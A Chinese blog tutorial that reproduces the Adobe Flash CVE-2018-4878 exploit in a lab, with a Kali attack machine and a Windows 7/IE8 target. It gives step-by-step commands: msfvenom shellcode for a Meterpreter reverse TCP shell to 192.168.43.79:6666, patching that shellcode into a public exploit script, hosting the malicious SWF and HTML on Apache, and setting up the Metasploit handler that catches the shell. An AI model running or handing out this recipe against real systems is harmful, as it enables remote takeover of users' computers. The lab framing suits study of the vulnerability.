Flash 0day漏洞复现 CVE-2018-4878

一.环境搭建

攻击机:kali     ip:192.168.43.79

靶机:windows7旗舰版     IE8      adobe flash player 28.0.0.137


1.adobe flash player 28.0.0.137 安装

百度adobe flash player for ie 28 进行下载,双击运行安装


查看版本方法:百度视频,随便点击一个视频,右键

Flash 0day漏洞复现 CVE-2018-4878_第1张图片

2.下载exp,链接:https://github.com/anbai-inc/CVE-2018-4878

二.开始复现漏洞

1.利用把exp放到kali的桌面


2.msf生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.79 LPORT=6666 -f py

Flash 0day漏洞复现 CVE-2018-4878_第2张图片

3.复制生成的shellcode,把exp里面的shellcode换成自己生成的

Flash 0day漏洞复现 CVE-2018-4878_第3张图片

4.这里需要修改下大佬的脚本把Ture改成False

Flash 0day漏洞复现 CVE-2018-4878_第4张图片

5.设置生成的路径

Flash 0day漏洞复现 CVE-2018-4878_第5张图片

6.运行exp,python cve-2018-4878.py,会在桌面生成2个文件


7.开启apache服务

service apache2 start

8.查看是否开启成功

service apache2 status

Flash 0day漏洞复现 CVE-2018-4878_第6张图片

9.把生成的2个文件移动到网站目录

cp index2.html /var/www/html/index2.html

cp exploit.swf /var/www/html/exploit.swf 

cd /var/www/html/

ls


10.打开msf进行监听

msfconsole

use exploit/multi/handler

set LHOST 192.168.43.79

set LPORT 6666

set payload windows/meterpreter/reverse_tcp

Flash 0day漏洞复现 CVE-2018-4878_第7张图片

查看设置是否有错,show options

Flash 0day漏洞复现 CVE-2018-4878_第8张图片

exploit运行


11.打开靶机,利用IE访问kali的网站,http://192.168.43.79/index2.html

Flash 0day漏洞复现 CVE-2018-4878_第9张图片

12.返回kali就可以看到成功的返回了一个会话sessions

Flash 0day漏洞复现 CVE-2018-4878_第10张图片

13.当靶机关掉IE后反弹的session也会跟着断掉



感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!


你可能感兴趣的:(漏洞复现)